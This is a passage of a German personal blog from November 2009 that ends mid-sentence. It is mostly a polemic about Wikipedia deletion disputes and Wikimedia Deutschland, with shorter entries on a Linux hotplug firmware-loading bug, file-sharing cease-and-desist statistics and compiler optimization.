Ich (oder wir, denn normalerweise bin ich ja nicht alleine in solchen Debatten) hole dann immer meine Liste raus. Wir haben eine längliche Liste von Vorschlägen erarbeitet. Wir haben sie gebloggt. Ich habe Vorschläge gebloggt. Frank hat sie gebloggt. Kris hat Vorschläge gebloggt. Pavel hat Vorschläge gebloggt. Wir haben uns alle gegenseitig verlinkt. Wir sind von diversen anderen Blogs und von Zeitungen verlinkt worden. Wir haben eine Radiosendung gemacht, wo wir zwei Stunden lang unsere Vorschläge vorgestellt und darüber geredet haben. Wir (also meine Freunde, nicht ich) sind zu diesem Wikimedia-Treffen gegangen und haben dort versucht, unsere konstruktiven Vorschläge zu thematisieren. Daher hatten wir noch nie Schwierigkeiten, unsere Vorschläge zu bringen. Normalerweise endet das Gespräch dann. Und heute ist es mir beim Reflektieren wie Schuppen von den Augen gefallen. Keiner hat darauf jemals eine Antwort erwartet!
Lasst mich das in einem neuen Absatz nochmal hinschreiben.
Die Frage nach konstruktiven Gegenvorschlägen von uns ist, so glaube ich jetzt erkannt zu haben, immer rhetorisch gemeint gewesen.
Das ist natürlich schwer nachzuweisen, aber ich habe Indizien. Z. B. beim Chaosradio, da kam nach 10 Minuten Gespräch von Sargoth (dem Wikipedianer, den Frank eingeladen hatte), die überraschte Ansage, er sei total verwundert, dass wir uns da so viel Gedanken gemacht hätten. Und vorgestern im Club bei dem Gespräch mit Juliana und Ralf, da wurde das auch deutlich. Ich will mal versuchen, die Situation zu schildern. Und, bitte, ich meine das keinesfalls negativ über Juliana, Ralf oder Sargoth hier! Es ist aber essentiell zum Verständnis des Problems, warum unsere Diskussion nicht weiterkommt gerade.
Also. Anekdoten-Zeit. Vorsicht: Wir haben das Gespräch nicht aufgezeichnet, und das ist jetzt zwei Tage her, und ich will einen Punkt machen. Ich überspitze leicht.
Juliana und Ralf kommen rein, setzen sich, ich mache mein Notebook aus und hole einen Block und einen Stift raus.
Erstaunen.
Juliana packt ihr Netbook aus, schließt es an unser Internet an (ja, im Club gibt es im Gegensatz zu Wikimedia freies Internet für Gäste :-) ), hat die Wikipedia als Homepage eingestellt. An dieser Stelle zeigt sie mir etwas, das jetzt aber keine Rolle spielt gerade, das kann ich vielleicht später nochmal thematisieren.
Der Punkt ist: Ich mache mein Notebook aus zum Gesprächsbeginn, sie macht ihres an. Ich habe einen Block dabei, um mir Notizen zu machen. Sie nicht. Denkt mal drüber nach, was das über die Gesprächsteilnehmer und ihre Intentionen und Vorstellungen zum Ziel des Gesprächs aussagt. Als wir dann unsere Liste mit konstruktiven Vorschlägen ausbreiteten und da Diagramme malten und ihr Stichworte gaben, hat Juliana die schon mitgeschrieben, auf meinem Block dann halt. Ich will ihr nicht vorhalten, dass sie keinen Block dabei hatte, darum geht es nicht. Es geht darum, dass ich den Eindruck hatte, eigentlich wollten die nicht wirklich von uns hören, was wir für Vorschläge haben. Oder genauer: Sie gingen davon aus, wir hätten keine. Ich hatte sogar ein bisschen das Gefühl, sie hielten uns für Trolle. Genau das Zerrbild, das in der Wikipedia von den bösen Bloggern gepflegt wird. Sie dachten, unser Kritik-Kartenhaus fällt in sich zusammen, wenn sie uns nach konstruktiven Vorschlägen fragen.
Nochmal: Ich will hier weder Sargoth noch Juliana noch Ralf beschimpfen oder kritisieren, im Gegenteil. Hut ab! Hochachtung! Respekt! Ihr hattet im Gegensatz zu den anderen Wikipedianern genug Arsch in der Hose, um euch mit uns zu treffen, um mit uns zu reden! Es gab noch andere, aber ich nenne nur diejenigen, die sich öffentlich mit uns getroffen haben und nichts dagegen hatten, dass wir ihre Namen nennen. Es tut mir leid, dass ich meinen Punkt an euch illustrieren muss, weil sich so viele andere hinter ihren Pseudonymen verstecken und lieber Foren-Heckenschützen sein wollen, als sich über die Zukunft der Wikipedia Gedanken zu machen.
Oh, und eines noch. In den Diskussionen sind unsere Gedanken zur Zukunft der Wikipedia häufig ein-zwei Größenordnungen weiter gediehen als was aus der Wikipedia selber kommt (und komme mir jetzt keiner mit "Kompass 2020"). Ich meine damit das, was die Wikipedianer im Gespräch an Vorschlägen und Argumenten haben. Vermutlich wird es da schon irgendwo Webseiten geben in der Wikipedia, wo sich auch schon mal jemand richtig tiefschürfend Gedanken gemacht hat. Während wir Strategien diskutiert haben, wie man die Benutzerführung konkret ändern könnte, um das Verhalten der Nutzer zu verbessern, und während wir uns Gedanken gemacht haben, von welchen psychologischen Effekten das aktuelle Verhalten der User und Admins in der Wikipedia befördert wird, und wie man das verbessern kann, kamen an Vorschlägen von der Gegenseite bisher eher Schulterzucken und Durchhalteparolen. Es gibt in Deutschland soviele Wikipedia-Stammtische! Das kann doch nicht sein, dass ihr da nur Bier trinkt? Denkt da wirklich niemand tiefschürfend darüber nach, wie man die Welt verbessern kann?!
Also bitte, liebe Wikipedianer. Helft uns, das Niveau der Diskussion zu erhöhen.
Ein guter erster Schritt wäre, wenn ihr vor dem Diskutieren unsere bereits veröffentlichten Vorschläge und Argumente zur Kenntnis nehmt. Das Ziel der Diskussion ist ein Erkenntnisgewinn auf beiden Seiten, nicht nur auf eurer. Und für uns wird das deutlich befriedigender, wenn wir von euch auch mal neue Argumente oder reflektierte Gedankengänge zum Thema Zukunft der Wikipedia hören können. Und ja, ihr könnt davon ausgehen, dass wir uns eure Standard-Argumente auch vorher durchgelesen haben.
Update: In den Diskussionen zum Wikipedia-Kurier geht es gerade hoch her. Ich poste keinen Link, weil ich die Wikipedia ja nicht mit Schmutz bewerfen will hier, sondern an einer Klärung interessiert bin. Aber eine Sache will ich aufgreifen, die Markus Cyron dort anspricht. Da kommt die Frage, wieso wir uns an so technischen Dingen aufhalten. Was eine Eingabemaske mit dem Löschen von Artikeln zu tun hat. Der Hintergrund ist die Disziplin "User Interface Design" und hat viel mit Psychologie zu tun. Ich will das mal an einem einfachen Beispiel erläutern. Stellt euch mal folgendes Experiment vor. Ein Raum, darin 20 Leute, die die Versuchsperson nicht kennt, und eine Versuchsperson vor der Tür. Du sagst der Versuchsperson, dass die drei Leute links hinten in der Ecke in dem Raum drei Störer sind, um die sich die Versuchsperson kümmern soll. Der 1. Versuchsperson gibst du als Werkzeug Handschellen und eine Polizeiuniform. Der 2. Versuchsperson gibst du einen Block Papier, einen Stift, einen Tisch und Stühle. Der mit den Handschellen wird vermutlich versuchen, die Störer festzunehmen und rauszuschmeißen. Der mit dem Block wird sich vermutlich mit den Störern hinsetzen, ihnen zuhören, und sich Notizen machen.
Beim User Interface Design (und bei unseren Vorschlägen) geht es darum, mit möglichst wenig Aufwand Einfluß darauf zu nehmen, in welcher Rolle sich die User sehen. Was sie als ihre Handlungsoptionen wahrnehmen. Im Moment gebt ihr den Leuten Handschellen, und wir möchten ihnen einen Block Papier geben. Mal übermäßig vereinfacht. Also, Markus, wir erklären das auch gerne noch mal im persönlichen Gespräch in den Clubräumen, wenn du dich mit uns treffen willst. Schreib mir einfach ne Mail, dann machen wir ein Treffen.

Sat Nov 14 2009

[l] Kurze Klarstellung: Wenn ich das Wort "Blockwart" benutze, ist das keine Nazi-Beschimpfung. Der Wikipedia-Artikel stellt das so dar, wie ich vor ein paar Wochen konsterniert feststellen mußte, aber das entspricht nicht meinem Wortschatz. Ich kenne den Begriff aus meiner Kindheit als Beschreibung für Leute, die mit einem Fernglas an ihrem Fenster sitzen, um die Nachbarn beobachten zu können, wie sie eine Kaugummiverpackung auf die Straße fallen lassen, um sie dann anzuzeigen. Leute, die es zu ihrem Lebensinhalt machen, andere bei Regelverstößen zu überführen, um sie dann bestrafen (lassen) zu können. Wenn man bei der Wikipedia runterscrollt, findet man das auch:
Blockwart gilt heute als Synonym für einen Spitzel und Denunzianten in der Nachbarschaft.
Ex-akt. Und im Internet, um das es hier geht, gibt es noch eine Spezialbedeutung:
In deutschsprachigen Webforen (dort auch Brettwart genannt) und Newsgroups ist Blockwart ein Schimpfwort für Teilnehmer, die sich bemühen, andere wegen vermuteten Verstoßes gegen Forumsregeln durch den zuständigen Administrator sperren zu lassen (Blockwartmentalität).
Bingo! So sieht das aus. Hier ist die Nazi-Bedeutung laut Wikipedia:
Die sprachliche Verwirrung gipfelte später darin, dass die Helfer des Reichsluftschutzbundes die Bezeichnung „Blockwart“ erhielten
Äh, ja. Kann mir das mal jemand erklären, wie man das mißverstehen kann? Das ergibt doch gar keinen Sinn, einen Wikipedia-Admin als Helfer des Reichsluftschutzbundes zu beschimpfen!
Also, liebe Leute, kommt mal bitte runter. Falls das wirklich jemand ernsthaft gedacht hat, dass ich hier Leute als Reichsluftschutzbundhelfer verunglimpfen wollte: nein, wollte ich nicht. Davon distanziere ich mich ausdrücklich, und es ist meiner Ansicht nach auch von Anfang an völlig klar gewesen, was ich mit dem Begriff gemeint haben könnte und was nicht. Ich bezeichne Leute überhaupt sehr selten als Nazis. Was ich gerne mal mache ist die Taten von Leuten mit bekannten Aktionen aus dem 3. Reich zu vergleichen. Das nennt man im Übrigen "vernunftbegabt" und es gilt im Allgemeinen als Hauptunterscheidungsmerkmal zwischen Mensch und Tier. Der Mensch ist in der Lage, aus den Fehlern anderer zu lernen, ohne sie selber auch noch mal gemacht haben zu müssen. Er kann aus der Tatsache extrapolieren, dass dieses Verhalten früher bei jemand anderem schon mal ein Fehler war, und dann vorhersagen, dass es auch heute ein Fehler wäre.
[l] Ich hatte heute ein längliches Gespräch mit Juliana da Costa José und Ralf Roletschek, beide von Wikipedia, Juliana auch von Wikimedia. Ursprünglich war von einem kurzen Gespräch die Rede, am Ende waren es dann doch fast sieben Stunden in den Clubräumen des CCC Berlin. Ich kann jetzt hier nicht sieben Stunden kurz zusammenfassen, und viel davon waren auch irgendwelche Interna auf beiden Seiten, die im Interesse der Fortführung der Sachdebatte nicht unbedingt ans Tageslicht gezerrt werden müssen. Das hilft niemandem, wenn wir jetzt hier Schmutzwäsche auspacken.
Ich kann aber kurz meinen Eindruck zusammenfassen. Mein Eindruck ist, dass sich Wikimedia nicht aus eigener Kraft retten kann. Wikipedia könnte vielleicht mit Hilfe von außen noch gerettet werden, wenn wir Doktor House, Chuck Norris und das A-Team einfliegen. Aber nur, wenn der Wikimedia e.V. aus der Gleichung genommen wird. Bei Wikimedia e.V. sitzen im Wesentlichen die alten Wikipedia-Haudegen, die genug Einfluß hätten, um mal etwas zu reißen. Aber die trauen sich alle nicht, was zu reißen, weil sie um ihren Status innerhalb von Wikimedia fürchten. Ohne jetzt hier groß saftige Details ausplaudern zu wollen: der Außeneindruck, dass Wikimedia e.V. im Wesentlichen nichts für Wikipedia tut, und statt sie zu fördern Aktivisten und Projekten eher im Weg steht, der hat sich auch bei den Gesprächen mit Insidern bestätigt. Wir haben da natürlich über Einzelfälle geredet und es wird auch Ausnahmen geben. Der Punkt, der das am besten auf den Punkt gebracht hat, war unser Congress, wo wir der Wikipedia seit 10 Jahren einen Stand eingeräumt haben, um das Projekt zu fördern. Daher sind wir jetzt auch so bissig, weil wir das eben auch als unser Kind betrachten, das wir da mit großgezogen haben. Und vor zwei Jahren kamen die nicht mehr. Wir haben also heute mal gefragt, warum eigentlich nicht, und Ralf war einer der Freiwilligen gewesen, die immer für die Wikipedia den Stand gemacht haben. Ralf meinte dann, naja, wir hätten Eintritt haben wollen. Stimmt auch. Das liegt daran, dass wir so voll waren in den letzten Jahren, dass wir Gefahr liegen, bezahlende Leute nicht reinlassen zu können, und da erscheint es uns unfair, Wikimedia da ganz ohne Gegenleistung eine kostenlose Werbeplattform einzurichten, zumal auf dem Platz ein Dutzend Hacker Platz gehabt hätten. Und mal unter uns, wenn Wikimedia da auf sechsstelligen Beträgen sitzt, da müssen wir ja wohl nicht drüber reden, oder? Stellt sich raus, dass Wikimedia den Freiwilligen die Eintrittskarten nicht erstatten wollte. Wer noch nie auf dem Congress war: wir reden hier über einen so kleinen Betrag, dass Wikimedia mehr an Zinseinkünften einnimmt, als sie das gekostet hätte. Meine nächste Frage könnt ihr euch wahrscheinlich denken. Ich wollte wissen, wozu sie diesen Verein eigentlich haben, wenn der bei sowas die Spesen nicht zahlt. Antwort: Achselzucken.
Und wem das noch nicht reicht, um Wikimedia abschließend zu den Akten zu legen, den schicke ich mit freundlichen Grüßen zu Kompass 2020, dem "strategischen Plan für Wikimedia Deutschland", wo sie Bullshit-Bingo mit Begriffen wie "Stakeholder" spielen und von "Operativen Maßnahmen" reden. Da riecht man ja förmlich noch den Management-Consultant-Hohlkörper, der das geschrieben hat, durch! Ich meine, mal ehrlich, seriously? Die Tabelle hier? Ernsthaft? Und die Visionen erst:
1 Medien stellen freie Inhalte zur Verfügung und teilen unsere Ideen.
2 Freies Wissen ist in den Medien präsent
3 Journalisten haben bei Wikimedia-relevanten Themen einen direkten Draht zu WMDE.
und später, bei "Leser":
6 Jeder, der etwas wissen will, geht zu Wikimedia.
7 Die Inhalte sind hochwertig, fundiert und unübertroffen.
8 Alle Wikimedia-Marken sind etabliert.
Ich habe schon fundiertere Großkonzern-Visionen gelesen. Sehr erheiternd sind auch die Visionen zum Thema Usability. Ja! Die nehmen ernsthaft das Wort Usability in den Mund! Und reden von einfachem Zugriff für jüngere Schüler oder Ältere mit geringer Technikaffinität (Schulen werden bei Wikipedia schon mal weiträumig auf IP-Ebene abgeklemmt, weil die Schüler nämlich alles fiese Vandalen sind). Oh und als wir den beiden mal das CMS von www.ccc.de gezeigt haben, mit WYSIWYG-Editor im Browser, mit Dialogen, Wizards, Templates und Constraints, da sind denen fast die Tränen gekommen. "Wie, sowas geht?" Ich mußte mir ein paar vorweihnachtliche Mitleidstränen verdrücken, so rührend war das.
Wie alt ist Wikimedia jetzt? Sie geben sich wie eine verkrustete Partei von 50 Jahren, kurz vor der Revolution. Also wie gesagt, ich glaube nicht, dass da noch was zu retten ist. Dieser Verein muss zugemacht werden. Ich kann mir auch nicht vorstellen, dass die Wikimedia Foundation die Zustände bei Wikimedia e.V. gutheißen würde, wenn sie davon Bescheid wüßten.
Aber mal kurzfristiger gedacht, auf dem Weg zur Weltrevolution des Proletariats gibt es ja Zwischenschritte, und da haben wir denen mal feierlich eine Liste von konkreten Vorschlägen überreicht. Die hatten wir zwar auch schon alle geblogt, mehrfach, verteilt, und untereinander verlinkt und zitiert und wiederholt, und wir haben sie auch schon im Radio und auf deren Veranstaltung erwähnt, aber das reicht offensichtlich nicht, damit sie auch bei den Vorständen und Ex-Vorständen von Wikimedia ankommen. Die leben da so sehr in einem Wikipedia-Holodeck ohne Außensensoren, dass wir im Chat schon gescherzt haben, die Lösung sei die von "Ship in a Bottle".
Wir haben die Vorschläge auch nach Dringlichkeit, Aufwand bei der Umsetzung und Wirkungsgrad bewertet und sortiert und schöne Boxen aufgemalt. Ich mache mir keine Illusionen, dass die beiden jetzt mal eben die Wikipedia umkrempeln, aber alle großen Taten fangen mit einem ersten Schritt an. Der erste Schritt auf unserer Liste war, dass Wikimedia eine Deletionpedia für die deutsche Wikipedia hostet. Das kostet einmal gar nichts, weil sie das mit den bestehenden Daten in den bestehenden Datenbanken auf den bestehenden Servern mit der bestehenden Software abfackeln können. Und es würde einen Großteil der schädlichen Emotionen aus der Diskussion ziehen, weil keiner mehr das Gefühl haben müsste, ihm wird hier mir nichts dir nichts die in der Freizeit geleistete Herzensblut-Arbeit von Tagen von irgendeinem wildgewordenen Neandertaler gelöscht, der vom Thema keine Ahnung hat. Wenn die das gemacht haben, können wir über den Rest gleich viel entspanner reden.
Also, in diesem Sinne. Gucken wir mal, ob sie eine Deletionpedia machen. Monetär kostet das gar nichts. Aber es wäre eine immense symbolische Geste, weil es erstmalig greifbar einräumen würde, dass die Kritiker womöglich vielleicht doch ein kleines bisschen Recht haben könnten. Ich hoffe inständig, dass die Zuständigen so viel menschliche Größe aufbringen werden.
Update: Ja, ich fand auch, dass Kompass 2020 an Agenda 2010 erinnert. Aber ihr wisst ja, von der SPD lernen heißt … äh … #fail :-)
Update: Oh, und: Juliana hat angekündigt, das Gespräch aus ihrer Sicht im Wikipedia:Kurier zu besprechen. Das wird sicher auch noch mal spannend.
Update: Ralf weist mich gerade auf ein paar Fehlerchen hin. Er ist auch bei Wikimedia, der Wikipedia-Stand war nicht zehn Jahre lang (duh, das war "figure of speech"), und er hat auch beim Wikimedia gar nicht nachgefragt, ob sie ihm die Tickets erstatten. Damit trifft Wikimedia nicht mehr die komplette Schuld, aber immer noch der Großteil. Denn am Ende ist gar keiner gekommen.
Update: der erste Teil von Julianas Bericht ist jetzt online. Falls jemand sich wegen des Bildes fragt: ja, ich habe darum gebeten, dass die keine Bilder von mir auf die Wikipedia hochladen.

Thu Nov 12 2009

[l] Au weia ist da bei Wikimedia der Arsch auf Grundeis. Guckt mal hier. Und dann guckt euch mal diesen partiellen Screenshot von gestern an (Danke an DrNO für den Tipp):
Das lässt ja mal wieder tief blicken, wie unsouverän Wikimedia hier mit Kritik umgeht. Tilos Spende ist weg. Fast so unsouverän wie das Treffen neulich.
Update: Interessanterweise hat sich Wikimedia damit in die Wikipedia-Schußlinie gebracht, was sie ja bisher nach Kräften vermieden haben. Das wird sich vermutlich als wenig schlaue Entscheidung herausstellen.
Update: Wow, da platzt gerade ein Knoten. Ich bin ja an sich nicht dafür, denen auch nur einen Euro zu spenden, aber was da gerade passiert hat auch gute Seiten. Zum Einen stehen da echte Namen dran, im Gegensatz zu den Kindergarten-Pseudonymen, hinter denen sich in der Wikipedia die User verstecken. Zum Anderen entkräftet das das Argument, das wir zuletzt noch auf dem Wikimedia-Whitewash-Treffen gehört haben, Wikimedia habe kein Mandat für den Betrieb einer Deletionpedia für WP:DE, weil die Spenden ja nach wie vor reinkämen, also würden sie ja das richtige tun. Vielleicht passiert ja jetzt doch auch mal was Positives in dieser ganzen WP:Sickergrube. Übrigens, eine positive Sache gibt es ja abgesehen hiervon zu berichten: der Admin 32X verliert gerade seine Admin-Wiederwahl. Das war der mit dem "völkischen Beobachter", falls ihr euch erinnert. Vielleicht gibt es da ja doch so etwas wie Selbstheilungskräfte, und wir haben die nur noch nicht genug stimuliert.
Update: Es gibt jetzt auch eine (lahme) Stellungnahme von Wikimedia. "Wir beziehen […] keine Position in der aktuellen Relevanzdebatte", nee klar, "Unser Spendenticker ist […] die falsche Plattform".
Update: Au weia, lest euch mal die Kommentare durch, die sich der Wikimedia-Pavel mit der Stellungnahme eingefahren hat. Da kriegt man ja fast Mitleid. Käpt'n, wir haben Wassereinbruch! *gluck* *gluck* *gluck*
Update: Mir mailt gerade jemand folgendes:
Proaktiv der Hinweis, daß es beim Spenden nicht reicht, den Betrag auf "1 Euro" zu drehen, man muss auch noch ein Häkchen umsetzen - ansonsten ist der Betrag plötzlich 20 Euro. Ohne weitere Vorwarnung, die eigentlich überall woanders übliche Seite mit "Überprüfen Sie Ihre Angaben" fehlt.
Jetzt mailen mir andere, dass das doch nicht so ist, und man auch eine Mail kriegt, über die man sich auch beschweren kann. Ich geb das mal alles nur so weiter. Könnt ihr ja selber gucken. Ich vermute mal, dass derjenige Javascript ausgeschaltet hatte. Aber ein-zwei 20 Euro Spenden sind ja dazwischen gerutscht, also könnte da ja doch was dran sein.
Update: Mit dem "Blockwart" habe ich ja offensichtlich ins Mark getroffen, wie man auf diesem mir zugemailten Screenshot gut sehen kann. Ich verstehe gar nicht, was deren Problem dabei ist. Ich habe ja nirgendwo geschrieben, Wikipedia bestünde nur aus Blockwarten, oder die Admins seien alles Blockwarte. Im Gegenteil habe ich sie aufgerufen, die Blockwarte rauszuschmeißen. Es läßt tief blicken, dass offenbar auch der Herr Geschäftsführer der Wikimedia sich da persönlich angesprochen fühlt und da jetzt mit eiserner Hand durchgreift, nicht nur an der Eingangstür, wenn er persönlich den Heise-Reporter rausschmeißt, sondern auch bei den Kommentaren in seinem Hausblog. Tja, so ist das eben, wenn die Vorstellungen von PR-Funktionären ("Müller, wir brauchen auch so ein Blog, da können wir dann unsere PR-Botschaften verbreiten") auf die Realität treffen. Oh und ich bin entzückt, wie viele Vandalen sich öffentlich beschweren, dass ich keine Kommentarfunktion habe. Besser könntet ihr mich gar nicht in meiner Entscheidung bestätigen!

Wed Nov 11 2009

[l] Ich muss euch mal kurz an einer Linux-Geschichte teilhaben lassen. Ich habe ja, im Gegensatz zu so gut wie allen anderen Linux-Benutzern, mein Linux selber kompiliert und zusammengestellt. Das hat den Vorteil, dass ich Distributions-Fuckups nicht hilflos gegenüber stehe. Das hat den Nachteil, dass ich mitkriege, wie furchtbar die ganzen Open Source Pakete sind, und wie viel Schmerzen die Distro-Macher so auf sich nehmen, damit das aussieht, als funktioniert es halbwegs.
So hatte ich vor einer Weile das Problem, dass auf meinem Notebook mein WLAN nicht mehr funktionierte. Das lag daran, dass der Intel-WLAN-Treiber anfing, eine Firmware hochzuladen, und dafür das Hotplug-Interface zu benutzen. Hotplug, das ist eine archaische Shellskript-Sammlung von Greg Kroah-Hartmann, in einem Shellskript /sbin/hotplug gipfelnd, das dann andere Shellskripte aus /etc/hotplug/* aufruft, und dort die eigentlichen Daten über magische Environment-Variablen übergibt. Nach einer Weile rumdebuggen habe ich damals rausgefunden, dass das Hotplug sich aus den magischen Environment-Variablen (der ganze Prozess ist m.W. nicht brauchbar dokumentiert) einen Pfad zusammenpopelt, und dann am Ende cp aufruft, um /lib/firmware/radeon/RV770_me.bin nach /sys/devices/platform/r600_cp.0/data zu kopieren. Welches cp das am Ende wird, das hängt von $PATH ab. Ich habe ein /usr/bin/cp, ein /bin/cp und ein /opt/diet/bin/cp, alle unterschiedlich. Mein /usr/bin/cp ist von GNU coreutils, und das meinte der Autor von hotplug wohl. /bin/cp ist ein Notfall-cp aus einer alten Version von embutils, falls ich /usr nicht mounten kann oder mir die glibc zerschossen habe. /usr/bin ist vor /bin im Pfad, daher betrifft das nie jemanden. /opt/diet/bin/cp ist das aktuelle cp aus embutils, das ist für meinen User noch vor /usr/bin im Pfad. Hotplug wird aber direkt vom Kernel aufgerufen und erbt daher das Environment von init. Und das hat das Default-Environment, das der Kernel setzt beim Aufruf von init, nämlich
```
PATH=/sbin:/bin:/usr/sbin:/usr/bin
```
Am Ende hat hotplug also das alte Notfall-cp aufgerufen, das in Blöcken zu 1024 Bytes kopiert. Versteht mich nicht falsch: alle dieser cp Binaries sind willens und in der Lage, eine Datei zu kopieren, und hotplug benutzt auch keine komischen GNU-only Flags. Aber das Firmware-Interface des Kernels hat damals Dinge angenommen, die nur GNU cp so gemacht hat. Ich habe die genauen Details vergessen, aber das Notfall-cp hat 1024-Bytes geschrieben, und der Kernel nahm an, dass die Firmware in nur einem Chunk geschrieben wird, und daher schlug das fehl.
Nachdem ich meine Fassungslosigkeit überwunden habe, habe ich damals /etc/hotplug/firmware.agent angefasst, damit er händisch /usr/bin/cp aufruft und nicht bloß cp über $PATH, und damit war das Problem gelöst.
Gestern habe ich jetzt anlässlich dieser Meldung hier den Kernel 2.6.32-rc6 auf meinem Desktop probiert. Mein Desktop hat kein WLAN und lädt an sich keine Firmware. Auf meinem Desktop ist auch seit irgendwann mal vorbeugend /bin/cp ein Symlink auf /usr/bin/cp. Um so größer war meine Überraschung, als mit dem neuen Kernel plötzlich X nur noch ohne Grafik-Beschleunigung hochkam. Nach einer Packung debuggen stellte sich raus, dass er die Firmware nicht laden konnte. Nachtigall, ick hör dir trapsen, dachte ich mir, und prüfte, ob /bin/cp das richtige ist. War es. Mhh, nanu. Ich habe also geprüft, ob hotplug das richtige cp aufruft. Tat er, /usr/bin/cp. Komisch. Weiter debugged. Mal ein strace auf /usr/bin/cp gemacht. Und, was soll ich sagen, /usr/bin/cp kopiert bei mir in 32k-Blöcken. Mein embutils-cp benutzt hingegen mmap und kopiert in 4 MB Blöcken. Also habe ich /etc/hotplug/firmware.agent angefasst, damit er /opt/diet/bin/cp aufruft, und was soll ich euch sagen, jetzt ist mein X wieder beschleunigt.
Nur damit ihr mal seht, auf was für einem Treibsand-Fundament dieses Linux gebaut ist.
Wobei wahrscheinlich ich über drei Ecken Schuld bin. Mein coreutils ist Version 7.6, das ist AFAIK aktuell, aber meine hotplug-Shellskripte sind von 2006. Vielleicht gibt es da ein Update inzwischen.
Aber die Ironie, dass dieses Firmware-Interface so verstrahlt ist, dass es erst mit dem Fefe-cp nicht tat, und jetzt mit dem GNU-cp nicht tut, und ich es fixen kann, indem ich das Fefe-cp benutze, das ist schon grotesk. Freut euch alle, dass ihr solche Details nicht sehen könnt bei euren Distributionen. Und, falls das hier jemand liest, der für das Firmware-Laden-Interface im Kernel verantwortlich ist: SCHANDE! SCHANDE! SCHANDE!!
Update: hotplug ist seit Jahren obsolet und sollte ja eh nicht mehr installiert sein, weil es durch udev abgelöst wurde, was ich ja auch installiert habe. Nur leider hat das Vorhandensein von udev bei mir nie dazu geführt, dass der Kernel nicht trotzdem hotplug aufruft. Jetzt habe ich einige Zuschriften gekriegt, die mir erklärt haben, dass man beim Booten
```
echo > /sys/kernel/uevent_helper
```
machen muss. Nun starte ich ja beim Booten den udevd, und hätte mir gedacht, hey, wenn ich den da schon starte, dann ist der bestimmt auch so smart, obiges zu tun. Ist er aber nicht.

Mon Nov 9 2009

[l] Wenn ihr mal sehen wollt, wie krass die Contentmafia das Abmahnunwesen inzwischen optimiert und effizienter gemacht hat, den verweise ich mal auf diesen winzigen Einblick. Ich zitiere mal die betreffenden Twittermeldungen, um die es geht:
http://twitpic.com/ogoi7 - 2 x Filesharing: Auskunftsansprüche nach § 101 UrhG und die zwei zwei Gerichtsakten dazu.
So, für die Statistik: Fall 1: angegebener Wert der Auskunft: 3000,00 € bei 1739 IP-Adressen. Gegenstandswert einer Abmahnung 10000,00 €.
Für die Statistik: Fall 2: kein Wert angegeben oder festgesetzt bei 11306 IP-Adressen. Gegenstandswert einer Abmahnung 50000,00 €(!).
Denn so, werte Leser, wird in Deutschland Urheberrecht durchgesetzt. In einem Kommentar zu dem Blogpost sagt der Twitterer dann noch folgendes:
Die Daten wurden zwischen dem 14.09.09 und 16.09.09 sowie zwischen dem 12.09.09 und 18.09.09 erhoben.
Das ist inzwischen so ein Breitenphänomen, dass wir es hier nicht mehr mit einer Strafe zu tun haben, sondern mit einer Steuer. Die dann direkt in einen Bailout für die Contentmafia fließt.

Sun Nov 8 2009

[l] Wer auf dem Linux-Kongress meinen Vortrag gesehen hat, oder sich generell für Compiler-Optimierung interessiert, für den möchte ich hier mal auf dieses coole Projekt der LLVM-Leute hinweisen. Das schreibt mir gerade einer der LLVM-Leute, die sich meine Folien angeguckt hatten. Die haben da mal versucht, unter bestimmten Einschränkungen alle einfachen Integer-Funktionen zu generieren, und dann durch die üblichen Compiler laufen zu lassen, um nach Ausreißern zu suchen. Ihre Metrik heißt auch ganz lustig:
I call the resulting codes "maximally embarrassing" since each function represents some significant failure to optimize.
Und das übelste Beispiel, das sie bisher gefunden haben, ist:
```
int ZZ_00005bbd(int x,int y){return m1s((x?0:x),a8s(y,y));}
```
wobei m1s ein signed 16-bit multiply ist und a8s ein signed 8-bit add. Die Funktion sieht für meinen Geschmack schon mal nicht sehr offensichtlich aus, aber guckt sie euch genauer an. Der (x?0:x) Teil ist immer Null, hier wird also Null mal irgendwas gemacht, da kommt immer Null raus. gcc erkennt das und erzeugt Code, der konstant 0 zurück liefert. Wow.
Update: Meine Folien machen gerade die Runde im Internet, und sind sowohl bei Lambda the Ultimate als auch bei Mike Melanson (der bei Adobe für das Portieren des Flash-Plugins nach x86_64-linux zuständig ist). Wow. :-)
Usually I make sure that my slides contain everything said at the actual talk, so they are useful on their own if there is no video of the talk, but in this case I had way more slides than I could possibly cover in the allotted time, so I left things out. Basically, the gist was that for normal programming tasks, people should not waste time on doing optimizations that the compiler is already doing for them, or should be doing for them. And, in particular, I wanted to demonstrate that doing integer overflow and range checks can be free in some cases or almost free in the others. Performance is not a valid excuse to not do range checks and then create security vulnerabilities.
In the slides, I basically say that for many cases the compiler is actually smarter than the programmer, and this is true, but it may have offended the handful of people for which it is not true. So let me state here: yes, some people are smarter than the compiler. The probability that you are one of those people or that you even know one of those people is very small. :-)

Fri Nov 6 2009

[l] So, nachdem ich eine Nacht darüber geschlafen habe, noch mal ein Update zur Wikipedia-Situation gestern. Aus meiner Sicht hat Wikimedia dieses Treffen größtmöglich in den Sand gesetzt. Das Spannende ist aber, dass man daran sehen kann, wie sie das Problem sehen.
Wir haben es ja hier im Kern mit einem Kontrollproblem zu tun. Wir haben Wikipedianer, die Kontrolle über ihren Inhalt ausüben wollen. Während das per se wie eine noble Idee klingt, ist es das Gegenteil der Idee, mit der Wikipedia das geworden ist, was sie jetzt ist. Das Grundprinzip von Wikipedia ist ja gerade, dass alles gut wird, wenn man alle Menschen ran lässt, weil das Gute im Menschen überwiegt und sich der Schwarm am Ende in die richtige Richtung zur Verbesserung der Lage für alle bewegen wird. Und das ist schlauer als es auf den ersten Blick aussieht, denn ein Gutteil des Vandalismus erklärt sich eben über die Kontrollfunktion. Wenn der User sich als Mitarbeiter sieht, wird er nicht vandalieren. Wenn er sich aber als überwachter, kontrollierter Verdächtiger fühlt, wird er Reifen anstechen. Wenn man User wie vernunftbegabte Erwachsene behandelt, werden sie sich eher wie vernunftbegabte Erwachsene verhalten, als wenn man sie wie Kinder behandelt. Das ist eine Frage des Mindsets, mit dem man auf die Leute zugeht. Natürlich wird das Vandalismusproblem nie ganz weggehen, es gibt immer ein paar Soziopathen in der Bevölkerung. Aber dieser Mindset will eben kommuniziert werden. Wenn man da mit "Hallo lieber potentieller Wikipedia-Mitautor, willst du nicht diesen Artikel zu verbessern mithelfen?" begrüßt wird, ist das was ganz anderes, als wenn da — fast wie versehentlich wirkend — jemand den Edit-Knopf auszublenden vergessen hat. Im Moment wirkt das wie ein Getränkeautomat, das menschliche Element fehlt. Wenn das wie ein Automat wirkt, werden die Leute eher Dinge probieren. Aus einem Getränkeautomat werden Leute eher eine Dose zu klauen versuchen als aus einem 